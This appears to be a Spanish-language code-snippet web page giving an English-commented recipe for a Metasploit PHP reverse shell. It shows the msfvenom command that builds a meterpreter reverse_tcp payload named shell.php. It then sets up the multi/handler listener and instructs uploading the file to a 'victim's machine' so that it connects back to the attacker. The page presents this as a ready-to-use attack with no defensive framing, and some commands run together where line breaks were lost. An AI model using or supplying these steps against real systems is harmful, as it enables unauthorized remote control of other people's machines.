Saltar al contenido

metasploit establecer carga útil windows meterpreter reverse_tcp msfvenom windows ejemplo de código

Anduvimos buscado en diferentes foros para así darte la solución para tu duda, en caso de dificultades puedes dejarnos tu inquietud y contestaremos porque estamos para ayudarte.

Ejemplo: shell inverso msfvenom php

##This will create the payload file "shell.php" with your ip and port.
msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP>LPORT=<$LOCAL_PORT> -f raw -o shell.php
##You can always "nano" the file to change your ipaddr and port incase you messed up the first step.#Run 'msfconsole' to start the listener then run the following command.
use exploit/multi/handler 
set PAYLOAD php/meterpreter/reverse_tcp
#set your ipaddrset LHOST <$LOCAL_IP>#set your listening portset LPORT <$LOCAL_PORT>#"show options" to check ur steps then run the command "exploit"
exploit #this will start the listener#Upload "shell.php" to your victim's machine.#The victim's machine will need to run the file to connect back to your machine.

¡Haz clic para puntuar esta entrada!
(Votos: 0 Promedio: 0)



Utiliza Nuestro Buscador

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *